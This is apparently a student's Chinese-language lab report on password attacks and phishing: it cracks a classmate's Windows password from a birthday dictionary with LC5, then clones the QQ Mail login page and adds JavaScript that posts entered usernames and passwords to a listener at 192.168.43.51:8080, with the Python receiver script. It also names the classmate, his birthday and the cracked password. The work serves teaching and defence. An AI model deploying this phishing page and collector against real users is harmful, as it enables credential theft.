网络安全实验1——口令攻击和钓鱼攻击

实验说明

口令攻击和钓鱼攻击是生活中两种较为常见的攻击方式，通过对攻击过程的复现，能够让学生对其有直观的认识，进而思考相应的防范措施。

实验目的

能够了解实验规范和实验所需的编程环境
能够理解社会工程学在口令攻击中的作用，掌握设计安全口令的方法
能够掌握钓鱼攻击技术和相应的防范手段
培养公民意识，提高社会责任感，积极向社会普及信息安全知识

实验原理

课程第 2 讲可用性和心理学

实验环境

Windows 桌面系统，Visual Studio 6.0 及以上版本

实验内容

（1）Windows 口令破解
（2）QQ 邮箱的钓鱼攻击

练习 1 Windows 口令破解

字典破解是口令攻击的一种常用方式，是指破解者通过对用户的了解，猜测其可能使用某些信息作为密码，例如其姓名、生日、电话号码等，同时结合对密码长度的猜测，利用工具来生成密码破解字典。

基本操作

实验平台–> 主机安全–> 实验 2 口令破解–> 练习 1 Windows 口令

（1）两人一组，相互为对方计算机新增账户并设置密码，并向对方提供一定的提示信息。为了达到实验效果，用户口令不要设置得过于复杂。

（2）根据对方所给的提示，并结合自己日常的了解猜测可能设置的密码，生成密码字典。

（3）进入实验平台，单击工具栏“字典生成器”按钮，启动“字典生成器”。选择“生日”标签页，输入的年份与月份信息应尽量包含步骤(1) 中用到的生日日期，在“生成字典”标签页中确定字典文件存放的路径以及新用户口令位数，最后生成字典文件。

（4）单击工具栏“LC5”按钮，启动 LC5 口令破解工具。选择“Session”（会话）｜“Session Options…”（会话选项）菜单项，在弹出的“Auditing Options For This Session”对话框中选中“Dictionary Crack”项的“Enabled”，取消其它项的“Enabled”。

单击“Dictionary List”（字典列表）按钮，导入步骤(2) 中生成的字典文件。返回 LC5 主界面，选择“Session”｜“Import…”（导入）菜单项，在弹出的“Import”对话框中导入本地用户列表，选择“Session”｜“Begin Audit”（开始审计）菜单项，开始字典破解用户口令。

设置密码

我的队友是张庚辰同学，他的生日是2000-7-21

设置生日并导出密码文件，改后缀为.dic

破解成功，显示密码为zgc0721

思考与总结

总结设计安全口令的因素，以及应如何设计安全的口令。

避开生日等个人信息
使用大小写字母+数字+符号的混合密码如6P9N>j(F9D8[D)qD或者{6p$4Mcy}VCu83c*
符号大小写字母数字要混在一起
不要将密码写在纸/本子上

练习 2 QQ 邮箱的钓鱼攻击

从社会工程学的角度来说，往往由于用户的疏忽大意，不小心访问了错误的网站，而该网站的页面与正常网站并无差别，用户在输入个人私密信息后，用户的敏感信息便被非法的窃取。

构造钓鱼页面

打开 https://mail.qq.com/，右键快捷菜单保存 QQ 邮箱首页，保存网页的全部内容
用文本编辑器打开文件夹中的 xlogin.html 文件，定位到登录按钮（login_button）代码处，为其添加单击事件。同时，在

响应函数

function saveAccount(){var user=document.getElementById("u").value;var passwd=document.getElementById("p").value;var httpRequest=new XMLHttpRequest();httpRequest.open('POST','http://192.168.43.51:8080',true);httpRequest.setRequestHeader("Content-type","application/x-www-form-urlencoded");httpRequest.send("user="+user+'&pwd='+passwd);}

接收钓鱼所得的账号和密码

# -*- coding: UTF-8 -*-
from socket import *  # 导入 socket 模块
import sys
host ='192.168.43.51'#ip地址
port=8080#端口
bufsize=1024addr=(host,port)
sock=socket(AF_INET,SOCK_STREAM)#创建流式套接字
sock.bind(addr)#绑定套接字
sock.listen(5)#监听while True:AcceptSocket,AcceptAddr=sock.accept()#接收的套接字print("连接成功，客户端地址为：",AcceptAddr)data=AcceptSocket.recv(bufsize)#接受的数据print(data.decode())#将数据进行解码AcceptSocket.close()sock.close()
sys.exit(0)

实验验证

运行程序，打开在本地保存的网页，输入账号密码，程序运行截图如下：